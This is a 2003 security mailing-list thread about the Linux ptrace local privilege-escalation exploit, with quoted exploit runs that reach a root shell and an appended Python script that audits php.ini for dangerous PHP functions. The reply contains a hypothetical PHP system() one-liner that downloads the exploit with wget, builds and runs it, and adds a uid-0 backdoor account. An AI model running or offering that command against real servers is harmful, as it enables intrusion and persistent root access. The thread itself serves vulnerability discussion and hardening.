[LUGOS-SEC] Ptrace vulnerability once again
rok at noname.rula.net
Tue Apr 15 17:07:27 CEST 2003
On 15.04.03 at 16:29:11 +0200, Nejc Skoberne wrote:
> Hello.
> The matter is quite serious:
> nejko@Stinker:~$ gcc -o ptrace-kmod ptrace-kmod.c
> nejko@Stinker:~$ ./ptrace-kmod
> [+] Attached to 1967
> [+] Waiting for signal
> [+] Signal caught
> [+] Shellcode placed at 0x4000f287
> [+] Now wait for suid shell...
> sh-2.05a# uname -a
> Linux Stinker 2.4.20 #3 SMP Mon Apr 3 23:47:03 CEST 2006 i586 unknown
$ uname -r
2.4.18-wolk3.8
$ ./ptrace
[+] Attached to 20108
[+] Signal caught
[+] Shellcode placed at 0x2000f287
[-] Unable to write shellcode: Input/output error
Killed
$ id
uid=1000(r) gid=100(users) groups=100(users)
> For servers where users do not have shell access - is it
> worth patching, or waiting for 2.6?
Hypothetically, say you have an ftp and a www server on the machine, and your
apache also runs with php support... would it be hard for a user to write a
little script and upload it, then use php to run the script and, with it, the exploit?
Even if he doesn't have ftp...
system('wget ...ptrace.c; make ptrace; ./ptrace; useradd r00t -u 0 -p t00r');
Of course, I have no idea whether the above would work...
Regards, rok
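
The reply above argues that PHP's `system()` gives web users a way to run local programs even without shell accounts. As an added example (not part of the original thread), this Python sketch audits php.ini text for the process-spawning functions that `disable_functions` leaves callable; the function names, the sample ini contents and the "last setting wins" rule are assumptions of the example.

```python
# Added example (not from the original thread): audit php.ini text for
# PHP functions that let an uploaded script run local programs.
import re

# PHP built-ins that start external processes (the backtick operator
# follows shell_exec).
EXEC_FUNCTIONS = {"system", "exec", "passthru", "shell_exec",
                  "popen", "proc_open", "pcntl_exec"}

_DIRECTIVE = re.compile(r"^\s*disable_functions\s*=\s*(.*)$", re.IGNORECASE)


def disabled_functions(ini_text):
    """Return the set of names in the effective disable_functions directive."""
    value = ""
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0]          # strip ';' comments
        match = _DIRECTIVE.match(line)
        if match:
            value = match.group(1)            # assumption: last setting wins
    value = value.strip().strip("\"'")
    return {name.strip().lower() for name in value.split(",") if name.strip()}


def exec_functions_enabled(ini_text):
    """List process-spawning functions that the ini text leaves callable."""
    return sorted(EXEC_FUNCTIONS - disabled_functions(ini_text))


# Constructed sample configurations (not taken from any real server).
WEAK_INI = """\
[PHP]
; disable_functions = system,exec
disable_functions =
"""
PARTIAL_INI = """\
[PHP]
disable_functions = "system, Exec , passthru"
"""
HARDENED_INI = """\
[PHP]
disable_functions = system,exec,passthru,shell_exec,popen,proc_open,pcntl_exec
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("partial", PARTIAL_INI),
                      ("hardened", HARDENED_INI)):
        print(name, exec_functions_enabled(ini))
```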